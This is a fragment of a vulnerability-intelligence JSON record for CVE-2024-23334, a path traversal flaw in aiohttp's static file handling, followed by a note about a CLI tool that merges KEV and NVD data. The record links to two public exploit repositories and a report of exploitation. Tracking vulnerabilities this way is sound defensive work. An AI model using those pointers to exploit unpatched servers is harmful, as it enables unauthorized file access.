      "shortDescription": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue.",
      "vulnerabilityName": "aiohttp aiohttp Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
      "required_action": "Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.",
      "knownRansomwareCampaignUse": "Known",
      "cve": [
        "CVE-2024-23334"
      ],
      "vulncheck_xdb": [
        {
          "xdb_id": "231b48941355",
          "xdb_url": "https://vulncheck.com/xdb/231b48941355",
          "date_added": "2024-02-28T22:30:21Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:ox1111/CVE-2024-23334.git"
        },
        {
          "xdb_id": "f1d001911304",
          "xdb_url": "https://vulncheck.com/xdb/f1d001911304",
          "date_added": "2024-03-19T16:28:56Z",
          "exploit_type": "infoleak",
          "clone_ssh_url": "git@github.com:jhonnybonny/CVE-2024-23334.git"
        }
      ],
      "vulncheck_reported_exploitation": [
        {
          "url": "https://cyble.com/blog/cgsi-probes-shadowsyndicate-groups-possible-exploitation-of-aiohttp-vulnerability-cve-2024-23334/",
          "date_added": "2024-03-15T00:00:00Z"
        }
      ],
      "date_added": "2024-03-15T00:00:00Z",
      "_timestamp": "2024-03-23T08:27:47.861266Z"
    }
  ]
}

vccve

There’s a project on Codeberg that has code and binaries for macOS, Linux, and Windows for a small CLI that gets you combined extended KEV and NVDv2 information all in one call.

The project README has examples and installation instructions.